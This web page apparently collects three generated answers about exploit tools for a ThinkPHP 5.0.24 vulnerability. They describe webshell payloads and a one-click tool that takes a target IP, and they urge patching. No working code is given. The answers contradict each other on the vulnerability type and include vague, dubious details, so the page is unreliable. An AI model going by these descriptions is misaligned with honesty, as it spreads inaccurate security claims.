### 回答1: ThinkPHP是一款优秀的PHP开发框架,但在不久前,其官方发布的5.0.24版本中存在一处安全漏洞,可以被攻击者利用进行非法操作或流量劫持。 近期网络上出现了一些ThinkPHP5.0.24漏洞利用工具,攻击者可以利用这些工具进行恶意攻击,比如模拟用户登录、上传恶意文件、获取服务器权限等。而这些攻击都可能严重危害服务器安全,甚至导致数据泄露或丢失。 因此,使用ThinkPHP5.0.24漏洞利用工具的行为是不道德的、非法的,同时也将危及自己和他人的安全。我们应该高度关注漏洞修复的情况,并及时更新框架版本,以保障网站安全。 此外,防范漏洞利用的最好方式是对网站进行全面加固,比如使用防火墙、加强用户认证、控制权限等等。只有在加强安全方面的努力下,才能避免因漏洞被攻击,导致不必要的损失。 ### 回答2: thinkphp5.0.24是一种基于PHP的开源Web应用框架,简单易用,并且具有高度扩展性。然而,其中存在一个被恶意利用的漏洞,即命令执行漏洞,攻击者可以利用该漏洞执行任意命令。 针对这个漏洞,黑客们开发了一些利用工具。其中,比较常见的有ThinkPHP5.0/5.1 远程代码执行漏洞利用工具和thinkphp5.0.24远程代码执行漏洞利用工具。 这些利用工具的基本原理是通过漏洞点执行一段代码,然后让服务器返回含有WebShell的Payload。其中,一个比较常用的Payload是通过控制Meta信息中的User-Agent,让服务器返回一段WebShell代码。得到WebShell后,攻击者可以执行任意命令。 针对此类漏洞,建议管理员及时更新最新版本的ThinkPHP,并定期对系统进行安全扫描等操作,以及增强系统的安全性。另外,也建议加强员工安全意识教育,不要随意下载不明来源的文件或点击垃圾邮件等操作。 ### 回答3: ThinkPHP是一个使用PHP语言开发的MVC框架,它具有开源、易上手、性能强等优点,因此被广泛应用于各类Web开发中。但是,ThinkPHP也存在一些漏洞,例如ThinkPHP 5.0.24版本中,存在一种反序列化漏洞,攻击者可以通过发送一个恶意的HTTP请求来执行任意代码,造成系统安全威胁。 为了利用该漏洞,黑客们开发了一些漏洞利用工具。其中,比较有名的是一款名为“ThinkPHP5.0.24 反序列化命令执行漏洞一键”的工具,该工具可以帮助攻击者快速识别和利用漏洞,在不需要过多技术能力的情况下就能实现攻击。 具体来说,该工具可以通过一些简单的配置,如输入目标IP地址、选择漏洞扫描或直接执行命令等,来实现对已知漏洞目标的攻击,从而获取系统权限、窃取敏感信息等恶意行为。 但是,提醒广大用户,利用漏洞工具进行攻击是违法的行为,严格禁止任何个人和组织非法攻击和滥用该工具。我们应该采取更有效的方式,如及时更新补丁、加强网络安全防范等,来保障自己和他人的网络安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值